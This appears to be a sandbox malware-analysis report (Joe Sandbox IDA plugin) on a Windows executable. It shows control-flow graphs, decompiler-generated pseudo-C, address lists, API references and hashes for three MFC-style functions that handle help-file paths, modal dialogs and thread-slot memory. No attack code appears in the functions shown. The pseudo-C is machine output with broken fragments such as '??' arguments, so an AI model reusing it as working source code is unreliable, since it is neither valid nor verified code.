                                                                                                                            control_flow_graph 142 419b6e-419bb9 call 40706d GetModuleFileNameA 145 419bbb-419bbd 142->145 146 419bbf call 407265 142->146 145->146 147 419bc4-419bd6 PathFindExtensionA 145->147 146->147 149 419bd8 call 407265 147->149 150 419bdd-419bf9 call 419b30 147->150 149->150 154 419c00-419c04 150->154 155 419bfb call 407265 150->155 157 419c06-419c18 call 41ed91 154->157 158 419c1f-419c24 154->158 155->154 157->158 168 419c1a 157->168 160 419c53-419c5a 158->160 161 419c26-419c3b call 40e905 158->161 162 419c9d-419ca1 160->162 163 419c5c-419c69 160->163 174 419c43 161->174 175 419c3d-419c41 161->175 170 419ca3-419ccf call 420d0c call 401330 call 41ed91 162->170 171 419cd5-419cec call 41d773 162->171 166 419c72 163->166 167 419c6b-419c70 163->167 172 419c77-419c95 call 402baf call 41ed91 166->172 167->172 168->158 170->168 170->171 172->168 190 419c97-419c9a 172->190 179 419c46-419c51 call 41ed91 174->179 175->179 179->160 179->168 190->162
                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E00419B6E(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
				char _v124;
				char* _v128;
				char _v660;
				char _v804;
				char _v812;
				char _v820;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				char* _t52;
				char* _t56;
				void* _t58;
				void* _t69;
				void* _t71;
				char* _t74;
				char* _t76;
				char* _t79;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t94;
				signed int _t96;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;

				_t88 = __edx;
				_t85 = __ecx;
				_t96 =  &_v660;
				_t103 = _t102 - 0x310;
				_t43 =  *0x441590; // 0x4917eadc
				_a652 = _t43 ^ _t96;
				_push(_t82);
				_push(_t89);
				_t93 = __ecx;
				_t90 = E0040706D(_t82, _t89, __ecx, __eflags);
				 *(_t90 + 8) =  *(_t93 + 0x44);
				 *(_t90 + 0xc) =  *(_t93 + 0x44);
				if(GetModuleFileNameA( *(_t93 + 0x44),  &_a392, 0x104) == 0) {
					L6:
					E00407265(_t85);
				} else {
					__eflags = __eax - 0x104;
					if(__eax == 0x104) {
						goto L6;
					}
				}
				_t52 = PathFindExtensionA( &_a392); // executed
				__eflags = _t52;
				_v128 = _t52;
				if(_t52 == 0) {
					E00407265(_t85);
				}
				 *_v128 = 0;
				_t56 = E00419B30(_t85,  &_a392,  &_a132, 0x104);
				__eflags = _t56;
				if(_t56 != 0) {
					E00407265(_t85);
				}
				__eflags =  *(_t93 + 0x60);
				if( *(_t93 + 0x60) != 0) {
					L14:
					_t57 =  *(_t93 + 0x50);
					__eflags = _t57;
					if(_t57 != 0) {
						L19:
						 *(_t90 + 0x10) = _t57;
						__eflags =  *(_t93 + 0x64);
						if( *(_t93 + 0x64) != 0) {
							L25:
							__eflags =  *(_t93 + 0x68);
							if( *(_t93 + 0x68) != 0) {
								L27:
								_pop(_t91);
								_pop(_t94);
								_pop(_t84);
								_t58 = E0041D773(_t57, _t84, _a652 ^ _t96, _t88, _t91, _t94);
								__eflags =  &_a656;
								return _t58;
							} else {
								E00401330(E00420D0C(_t88,  &_a132, 0x104, ".INI"));
								_t57 = E0041ED91( &_a132);
								_t103 = _t103 + 0x14;
								__eflags = _t57;
								 *(_t93 + 0x68) = _t57;
								if(_t57 == 0) {
									goto L13;
								} else {
									goto L27;
								}
							}
						} else {
							_t71 =  &_a652 - _v128;
							__eflags =  *((intOrPtr*)(_t93 + 0x6c)) - 1;
							if( *((intOrPtr*)(_t93 + 0x6c)) != 1) {
								_push(".HLP");
							} else {
								_push(".CHM");
							}
							_push(_t71);
							_push(_v128);
							E00402BAF(_t88, _t96);
							_t103 = _t103 + 0xc;
							_t74 = E0041ED91( &_a392);
							__eflags = _t74;
							_pop(_t85);
							 *(_t93 + 0x64) = _t74;
							if(_t74 == 0) {
								goto L13;
							} else {
								_t57 = _v128;
								 *_v128 = 0;
								goto L25;
							}
						}
					} else {
						_t76 = E0040E905(0x104, _t90, _t93, _t96, 0xe000,  &_v124, 0x100);
						__eflags = _t76;
						if(_t76 == 0) {
							_push( *(_t93 + 0x60));
						} else {
							_push( &_v124);
						}
						_t57 = E0041ED91();
						__eflags = _t57;
						 *(_t93 + 0x50) = _t57;
						_pop(_t85);
						if(_t57 == 0) {
							goto L13;
						} else {
							goto L19;
						}
					}
				} else {
					_t79 = E0041ED91( &_a132);
					__eflags = _t79;
					_pop(_t85);
					 *(_t93 + 0x60) = _t79;
					if(_t79 != 0) {
						goto L14;
					} else {
						L13:
						_push(_t96);
						_t99 = _t103;
						_push(_t85);
						_v804 = 0x4407c8;
						E00420866( &_v804, 0x43b874);
						asm("int3");
						_push(_t99);
						_t100 = _t103;
						_push(_t85);
						_v812 = 0x440860;
						E00420866( &_v812, 0x43b8b8);
						asm("int3");
						_push(_t100);
						_push(_t85);
						_v820 = 0x4408f8;
						E00420866( &_v820, 0x43b8fc);
						asm("int3");
						_t69 = _t85;
						 *((intOrPtr*)(_t69 + 4)) = 1;
						return _t69;
					}
				}
			}




































                                                                                                                            0x00419b6e
                                                                                                                            0x00419b6e
                                                                                                                            0x00419b6f
                                                                                                                            0x00419b76
                                                                                                                            0x00419b7c
                                                                                                                            0x00419b83
                                                                                                                            0x00419b89
                                                                                                                            0x00419b8b
                                                                                                                            0x00419b8c
                                                                                                                            0x00419b93
                                                                                                                            0x00419b98
                                                                                                                            0x00419b9e
                                                                                                                            0x00419bb9
                                                                                                                            0x00419bbf
                                                                                                                            0x00419bbf
                                                                                                                            0x00419bbb
                                                                                                                            0x00419bbb
                                                                                                                            0x00419bbd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00419bbd
                                                                                                                            0x00419bcb
                                                                                                                            0x00419bd1
                                                                                                                            0x00419bd3
                                                                                                                            0x00419bd6
                                                                                                                            0x00419bd8
                                                                                                                            0x00419bd8
                                                                                                                            0x00419be0
                                                                                                                            0x00419bf2
                                                                                                                            0x00419bf7
                                                                                                                            0x00419bf9
                                                                                                                            0x00419bfb
                                                                                                                            0x00419bfb
                                                                                                                            0x00419c00
                                                                                                                            0x00419c04
                                                                                                                            0x00419c1f
                                                                                                                            0x00419c1f
                                                                                                                            0x00419c22
                                                                                                                            0x00419c24
                                                                                                                            0x00419c53
                                                                                                                            0x00419c53
                                                                                                                            0x00419c56
                                                                                                                            0x00419c5a
                                                                                                                            0x00419c9d
                                                                                                                            0x00419c9d
                                                                                                                            0x00419ca1
                                                                                                                            0x00419cd5
                                                                                                                            0x00419cdb
                                                                                                                            0x00419cdc
                                                                                                                            0x00419cdf
                                                                                                                            0x00419ce0
                                                                                                                            0x00419ce5
                                                                                                                            0x00419cec
                                                                                                                            0x00419ca3
                                                                                                                            0x00419cb6
                                                                                                                            0x00419cc2
                                                                                                                            0x00419cc7
                                                                                                                            0x00419cca
                                                                                                                            0x00419ccc
                                                                                                                            0x00419ccf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00419ccf
                                                                                                                            0x00419c5c
                                                                                                                            0x00419c62
                                                                                                                            0x00419c65
                                                                                                                            0x00419c69
                                                                                                                            0x00419c72
                                                                                                                            0x00419c6b
                                                                                                                            0x00419c6b
                                                                                                                            0x00419c6b
                                                                                                                            0x00419c77
                                                                                                                            0x00419c78
                                                                                                                            0x00419c7b
                                                                                                                            0x00419c86
                                                                                                                            0x00419c8a
                                                                                                                            0x00419c8f
                                                                                                                            0x00419c91
                                                                                                                            0x00419c92
                                                                                                                            0x00419c95
                                                                                                                            0x00000000
                                                                                                                            0x00419c97
                                                                                                                            0x00419c97
                                                                                                                            0x00419c9a
                                                                                                                            0x00000000
                                                                                                                            0x00419c9a
                                                                                                                            0x00419c95
                                                                                                                            0x00419c26
                                                                                                                            0x00419c34
                                                                                                                            0x00419c39
                                                                                                                            0x00419c3b
                                                                                                                            0x00419c43
                                                                                                                            0x00419c3d
                                                                                                                            0x00419c40
                                                                                                                            0x00419c40
                                                                                                                            0x00419c46
                                                                                                                            0x00419c4b
                                                                                                                            0x00419c4d
                                                                                                                            0x00419c50
                                                                                                                            0x00419c51
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00419c51
                                                                                                                            0x00419c06
                                                                                                                            0x00419c0d
                                                                                                                            0x00419c12
                                                                                                                            0x00419c14
                                                                                                                            0x00419c15
                                                                                                                            0x00419c18
                                                                                                                            0x00000000
                                                                                                                            0x00419c1a
                                                                                                                            0x00419c1a
                                                                                                                            0x0040d87c
                                                                                                                            0x0040d87d
                                                                                                                            0x0040d87f
                                                                                                                            0x0040d889
                                                                                                                            0x0040d890
                                                                                                                            0x0040d895
                                                                                                                            0x0040d896
                                                                                                                            0x0040d897
                                                                                                                            0x0040d899
                                                                                                                            0x0040d8a3
                                                                                                                            0x0040d8aa
                                                                                                                            0x0040d8af
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3
                                                                                                                            0x00419c18

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                                                            • String ID: .CHM$.HLP$.INI
                                                                                                                            • API String ID: 1153805871-4017452060
                                                                                                                            • Opcode ID: df26863a7f59196e7cfe838306b067c46f1a4edddf31e93be4a7a76595b84b33
                                                                                                                            • Instruction ID: 1ddee15c7f382a1894cc361161dbe86c4055f7dda0e1a7681faaaebe5a12a87e
                                                                                                                            • Opcode Fuzzy Hash: df26863a7f59196e7cfe838306b067c46f1a4edddf31e93be4a7a76595b84b33
                                                                                                                            • Instruction Fuzzy Hash: FA4130719046099FDB30DF76DD55BDA77E8BF04304F40482BE985D7241EB38E9848B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404F3C Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 191 404f3c-404f66 call 41e9b4 call 40706d 196 404f87-404f8a 191->196 197 404f68-404f84 call 40706d FindResourceA LoadResource 191->197 199 404f98-404f9b 196->199 200 404f8c-404f95 LockResource 196->200 197->196 202 404fa5-404fc0 call 404a74 call 40a224 199->202 203 404f9d-404fa0 199->203 200->199 211 404fc2-404fcb GetDesktopWindow 202->211 212 405023-40503c call 40bc3c call 40a17c call 404d4c 202->212 204 4050f9-4050fe call 41ea59 203->204 211->212 214 404fcd-404fd8 IsWindowEnabled 211->214 223 405041-405045 212->223 214->212 216 404fda-404ff8 EnableWindow call 402551 214->216 216->212 222 404ffa-405006 216->222 222->212 230 405008-405011 call 40cf40 222->230 224 405080-4050a6 223->224 225 405047-40504b 223->225 231 4050b1-4050b4 224->231 232 4050a8-4050ac call 40cf5b 224->232 228 40506a-40506d 225->228 229 40504d-40505b call 40ce51 225->229 228->224 235 40506f-40507b call 40d105 228->235 242 405060-405068 call 409d12 229->242 243 40505d-40505f 229->243 230->212 244 405013-40501c call 40cf5b 230->244 239 4050c1-4050c4 231->239 240 4050b6-4050bb EnableWindow 231->240 232->231 235->224 245 4050c6-4050cf GetActiveWindow 239->245 246 4050da-4050eb call 404aae 239->246 240->239 242->228 243->242 244->212 245->246 249 4050d1-4050d4 SetActiveWindow 245->249 255 4050f6 246->255 256 4050ed-4050f0 FreeResource 246->256 249->246 255->204 256->255
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E00404F3C(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				struct HRSRC__* _t82;
				signed int _t84;
				void* _t97;
				struct HINSTANCE__* _t99;
				signed int _t100;
				void* _t101;
				intOrPtr* _t103;
				void* _t104;
				void* _t105;

				_t105 = __eflags;
				_t97 = __edx;
				_push(0x24);
				E0041E9B4(E00431254, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t104 - 0x20)) = __ecx;
				 *(_t104 - 0x1c) =  *(__ecx + 0x60);
				 *(_t104 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0040706D(__ebx, __edi, __ecx, _t105);
				_t99 =  *(_t54 + 0xc);
				_t84 = 0;
				_t106 =  *(_t103 + 0x58);
				if( *(_t103 + 0x58) != 0) {
					_t99 =  *(E0040706D(0, _t99, _t103, _t106) + 0xc);
					_t82 = FindResourceA(_t99,  *(_t103 + 0x58), 5); // executed
					_t54 = LoadResource(_t99, _t82);
					 *(_t104 - 0x18) = _t54;
				}
				if( *(_t104 - 0x18) != _t84) {
					_t54 = LockResource( *(_t104 - 0x18));
					 *(_t104 - 0x1c) = _t54;
				}
				if( *(_t104 - 0x1c) != _t84) {
					 *(_t104 - 0x14) = E00404A74(_t84, _t103, __eflags);
					E0040A224(_t84, _t99, _t103, __eflags);
					 *(_t104 - 0x28) =  *(_t104 - 0x28) & _t84;
					__eflags =  *(_t104 - 0x14) - _t84;
					 *(_t104 - 0x2c) = _t84;
					 *(_t104 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t104 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t104 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t104 - 0x14), 0);
								 *(_t104 - 0x2c) = 1;
								_t84 = E00402551();
								__eflags = _t84;
								 *(_t104 - 0x24) = _t84;
								if(__eflags != 0) {
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										__eflags = E0040CF40(_t84);
										if(__eflags != 0) {
											E0040CF5B(_t84, 0);
											 *(_t104 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					E0040BC3C(_t84, _t99, __eflags, _t103);
					_t58 = E0040A17C(_t84, _t97, _t104,  *(_t104 - 0x14));
					_push(_t99);
					_push(_t58);
					_push( *(_t104 - 0x1c));
					_t59 = E00404D4C(_t84, _t103, _t97, _t99, _t103, __eflags); // executed
					_t100 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t103 + 0x3c) & 0x00000010;
						if(( *(_t103 + 0x3c) & 0x00000010) != 0) {
							_t101 = 4;
							_t71 = E0040CE51(_t103);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t101 = 5;
							}
							E00409D12(_t103, _t97, _t101);
							_t100 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t103 + 0x20)) - _t100;
						if( *((intOrPtr*)(_t103 + 0x20)) != _t100) {
							E0040D105(_t103, _t100, _t100, _t100, _t100, _t100, 0x97);
						}
					}
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					__eflags =  *(_t104 - 0x28) - _t100;
					if( *(_t104 - 0x28) != _t100) {
						E0040CF5B(_t84, 1);
					}
					__eflags =  *(_t104 - 0x2c) - _t100;
					if( *(_t104 - 0x2c) != _t100) {
						EnableWindow( *(_t104 - 0x14), 1);
					}
					__eflags =  *(_t104 - 0x14) - _t100;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t103 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t104 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t103 + 0x60))();
					E00404AAE(_t84, _t103, _t100, _t103, __eflags);
					__eflags =  *(_t103 + 0x58) - _t100;
					if( *(_t103 + 0x58) != _t100) {
						FreeResource( *(_t104 - 0x18));
					}
					_t63 =  *(_t103 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E0041EA59(_t63);
				}
			}

















                                                                                                                            0x00404f3c
                                                                                                                            0x00404f3c
                                                                                                                            0x00404f3c
                                                                                                                            0x00404f43
                                                                                                                            0x00404f48
                                                                                                                            0x00404f4a
                                                                                                                            0x00404f50
                                                                                                                            0x00404f56
                                                                                                                            0x00404f59
                                                                                                                            0x00404f5e
                                                                                                                            0x00404f61
                                                                                                                            0x00404f63
                                                                                                                            0x00404f66
                                                                                                                            0x00404f6d
                                                                                                                            0x00404f76
                                                                                                                            0x00404f7e
                                                                                                                            0x00404f84
                                                                                                                            0x00404f84
                                                                                                                            0x00404f8a
                                                                                                                            0x00404f8f
                                                                                                                            0x00404f95
                                                                                                                            0x00404f95
                                                                                                                            0x00404f9b
                                                                                                                            0x00404fac
                                                                                                                            0x00404faf
                                                                                                                            0x00404fb4
                                                                                                                            0x00404fb7
                                                                                                                            0x00404fba
                                                                                                                            0x00404fbd
                                                                                                                            0x00404fc0
                                                                                                                            0x00404fc8
                                                                                                                            0x00404fcb
                                                                                                                            0x00404fd6
                                                                                                                            0x00404fd8
                                                                                                                            0x00404fdf
                                                                                                                            0x00404fe5
                                                                                                                            0x00404ff1
                                                                                                                            0x00404ff3
                                                                                                                            0x00404ff5
                                                                                                                            0x00404ff8
                                                                                                                            0x00405004
                                                                                                                            0x00405006
                                                                                                                            0x0040500f
                                                                                                                            0x00405011
                                                                                                                            0x00405017
                                                                                                                            0x0040501c
                                                                                                                            0x0040501c
                                                                                                                            0x00405011
                                                                                                                            0x00405006
                                                                                                                            0x00404ff8
                                                                                                                            0x00404fd8
                                                                                                                            0x00404fcb
                                                                                                                            0x00405023
                                                                                                                            0x00405028
                                                                                                                            0x00405030
                                                                                                                            0x00405035
                                                                                                                            0x00405036
                                                                                                                            0x00405037
                                                                                                                            0x0040503c
                                                                                                                            0x00405041
                                                                                                                            0x00405043
                                                                                                                            0x00405045
                                                                                                                            0x00405047
                                                                                                                            0x0040504b
                                                                                                                            0x0040504f
                                                                                                                            0x00405052
                                                                                                                            0x00405057
                                                                                                                            0x0040505b
                                                                                                                            0x0040505f
                                                                                                                            0x0040505f
                                                                                                                            0x00405063
                                                                                                                            0x00405068
                                                                                                                            0x00405068
                                                                                                                            0x00405068
                                                                                                                            0x0040506a
                                                                                                                            0x0040506d
                                                                                                                            0x0040507b
                                                                                                                            0x0040507b
                                                                                                                            0x0040506d
                                                                                                                            0x00405080
                                                                                                                            0x004050a3
                                                                                                                            0x004050a6
                                                                                                                            0x004050ac
                                                                                                                            0x004050ac
                                                                                                                            0x004050b1
                                                                                                                            0x004050b4
                                                                                                                            0x004050bb
                                                                                                                            0x004050bb
                                                                                                                            0x004050c1
                                                                                                                            0x004050c4
                                                                                                                            0x004050cc
                                                                                                                            0x004050cf
                                                                                                                            0x004050d4
                                                                                                                            0x004050d4
                                                                                                                            0x004050cf
                                                                                                                            0x004050de
                                                                                                                            0x004050e3
                                                                                                                            0x004050e8
                                                                                                                            0x004050eb
                                                                                                                            0x004050f0
                                                                                                                            0x004050f0
                                                                                                                            0x004050f6
                                                                                                                            0x00000000
                                                                                                                            0x00404f9d
                                                                                                                            0x00404f9d
                                                                                                                            0x004050f9
                                                                                                                            0x004050fe
                                                                                                                            0x004050fe

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00404F43
                                                                                                                            • FindResourceA.KERNEL32(?,?,00000005), ref: 00404F76
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00404F7E
                                                                                                                            • LockResource.KERNEL32(?,00000024,004010BD), ref: 00404F8F
                                                                                                                            • GetDesktopWindow.USER32 ref: 00404FC2
                                                                                                                            • IsWindowEnabled.USER32(?), ref: 00404FD0
                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00404FDF
                                                                                                                              • Part of subcall function 0040CF40: IsWindowEnabled.USER32(?), ref: 0040CF49
                                                                                                                              • Part of subcall function 0040CF5B: EnableWindow.USER32(?,?), ref: 0040CF68
                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 004050BB
                                                                                                                            • GetActiveWindow.USER32 ref: 004050C6
                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 004050D4
                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 004050F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1509511306-0
                                                                                                                            • Opcode ID: ca8c56d6c3a5c6498b8f6a35cb241de5a16361f6033836773364e7ed7f1a9551
                                                                                                                            • Instruction ID: f828eb5268e65ebf4db2c277c75616d55773a64f7fbee0cc19f95c877ff61a2d
                                                                                                                            • Opcode Fuzzy Hash: ca8c56d6c3a5c6498b8f6a35cb241de5a16361f6033836773364e7ed7f1a9551
                                                                                                                            • Instruction Fuzzy Hash: DE515D30A007059BDF21AFA5D8896AFBAB1EF44705F14053EE542B62D1CB7D8A41CF9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E3E1 Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 257 40e3e1-40e3fe EnterCriticalSection 258 40e400-40e407 257->258 259 40e40d-40e412 257->259 258->259 260 40e4c5-40e4c8 258->260 261 40e414-40e417 259->261 262 40e42f-40e437 259->262 266 40e4d0-40e4f0 LeaveCriticalSection 260->266 267 40e4ca-40e4cd 260->267 265 40e41a-40e41d 261->265 263 40e439-40e44c call 4014f0 GlobalAlloc 262->263 264 40e44e-40e46f GlobalHandle GlobalUnlock call 4014f0 GlobalReAlloc 262->264 274 40e475-40e477 263->274 264->274 270 40e427-40e429 265->270 271 40e41f-40e425 265->271 267->266 270->260 270->262 271->265 271->270 275 40e479-40e47e 274->275 276 40e49d-40e4c2 GlobalLock call 41ec90 274->276 277 40e480-40e488 GlobalHandle GlobalLock 275->277 278 40e48e-40e492 LeaveCriticalSection 275->278 276->260 277->278 278->276
                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E0040E3E1() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t38;
				signed int _t39;
				void* _t40;
				long _t43;
				void* _t44;
				void* _t60;
				long _t63;
				void* _t65;
				void* _t66;
				void* _t68;
				signed char* _t76;
				signed int _t80;
				void* _t83;
				void* _t85;
				signed int _t86;
				void* _t88;
				void* _t89;
				void* _t91;

				_push(_t68);
				_push(_t86);
				_t83 = _t68;
				_t1 = _t83 + 0x1c; // 0x1c
				_t38 = _t1;
				_v4 = _t38;
				EnterCriticalSection(_t38);
				_t39 =  *(_t83 + 4);
				if( *((intOrPtr*)(_t83 + 8)) >= _t39 || ( *( *((intOrPtr*)(__esi + 0x10)) + __edi * 8) & 0x00000001) != 0) {
					_t80 = 1;
					if(_t39 <= 1) {
						L11:
						_t86 = _t39 + 0x20;
						_t40 =  *(_t83 + 0x10);
						if(_t40 != 0) {
							_t65 = GlobalHandle(_t40);
							GlobalUnlock(_t65);
							_t43 = E004014F0(_t86, 8);
							_t68 = 0x2002;
							_t44 = GlobalReAlloc(_t65, _t43, ??);
						} else {
							_t63 = E004014F0(_t86, 8);
							_pop(_t68);
							_t44 = GlobalAlloc(2, _t63); // executed
						}
						if(_t44 != 0) {
							_t66 = GlobalLock(_t44);
							E0041EC90(_t80, _t66 +  *(_t83 + 4) * 8, 0, _t86 -  *(_t83 + 4) << 3);
							 *(_t83 + 4) = _t86;
							 *(_t83 + 0x10) = _t66;
							goto L19;
						} else {
							_t85 =  *(_t83 + 0x10);
							if(_t85 != 0) {
								GlobalLock(GlobalHandle(_t85));
							}
							LeaveCriticalSection(_v4);
							_push(_t86);
							_t88 = _t91;
							_push(_t68);
							_v28 = 0x4407c8;
							E00420866( &_v28, 0x43b874);
							asm("int3");
							_push(_t88);
							_t89 = _t91;
							_push(_t68);
							_v36 = 0x440860;
							E00420866( &_v36, 0x43b8b8);
							asm("int3");
							_push(_t89);
							_push(_t68);
							_v44 = 0x4408f8;
							E00420866( &_v44, 0x43b8fc);
							asm("int3");
							_t60 = _t68;
							 *((intOrPtr*)(_t60 + 4)) = 1;
							return _t60;
						}
					} else {
						_t76 =  *(_t83 + 0x10) + 8;
						while(( *_t76 & 0x00000001) != 0) {
							_t80 = _t80 + 1;
							_t76 =  &(_t76[8]);
							if(_t80 < _t39) {
								continue;
							}
							break;
						}
						if(_t80 < _t39) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					L19:
					if(_t80 >=  *((intOrPtr*)(_t83 + 0xc))) {
						 *((intOrPtr*)(_t83 + 0xc)) = _t80 + 1;
					}
					 *( *(_t83 + 0x10) + _t80 * 8) =  *( *(_t83 + 0x10) + _t80 * 8) | 0x00000001;
					 *((intOrPtr*)(_t83 + 8)) = _t80 + 1;
					LeaveCriticalSection(_v4);
					return _t80;
				}
			}



























                                                                                                                            0x0040e3e1
                                                                                                                            0x0040e3e3
                                                                                                                            0x0040e3e5
                                                                                                                            0x0040e3e7
                                                                                                                            0x0040e3e7
                                                                                                                            0x0040e3ec
                                                                                                                            0x0040e3f0
                                                                                                                            0x0040e3f6
                                                                                                                            0x0040e3fe
                                                                                                                            0x0040e40f
                                                                                                                            0x0040e412
                                                                                                                            0x0040e42f
                                                                                                                            0x0040e42f
                                                                                                                            0x0040e432
                                                                                                                            0x0040e437
                                                                                                                            0x0040e455
                                                                                                                            0x0040e458
                                                                                                                            0x0040e466
                                                                                                                            0x0040e46c
                                                                                                                            0x0040e46f
                                                                                                                            0x0040e439
                                                                                                                            0x0040e43c
                                                                                                                            0x0040e442
                                                                                                                            0x0040e446
                                                                                                                            0x0040e446
                                                                                                                            0x0040e477
                                                                                                                            0x0040e4a4
                                                                                                                            0x0040e4b7
                                                                                                                            0x0040e4bf
                                                                                                                            0x0040e4c2
                                                                                                                            0x00000000
                                                                                                                            0x0040e479
                                                                                                                            0x0040e479
                                                                                                                            0x0040e47e
                                                                                                                            0x0040e488
                                                                                                                            0x0040e488
                                                                                                                            0x0040e492
                                                                                                                            0x0040d87c
                                                                                                                            0x0040d87d
                                                                                                                            0x0040d87f
                                                                                                                            0x0040d889
                                                                                                                            0x0040d890
                                                                                                                            0x0040d895
                                                                                                                            0x0040d896
                                                                                                                            0x0040d897
                                                                                                                            0x0040d899
                                                                                                                            0x0040d8a3
                                                                                                                            0x0040d8aa
                                                                                                                            0x0040d8af
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040e414
                                                                                                                            0x0040e417
                                                                                                                            0x0040e41a
                                                                                                                            0x0040e41f
                                                                                                                            0x0040e420
                                                                                                                            0x0040e425
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e425
                                                                                                                            0x0040e429
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e429
                                                                                                                            0x0040e4c5
                                                                                                                            0x0040e4c5
                                                                                                                            0x0040e4c8
                                                                                                                            0x0040e4cd
                                                                                                                            0x0040e4cd
                                                                                                                            0x0040e4da
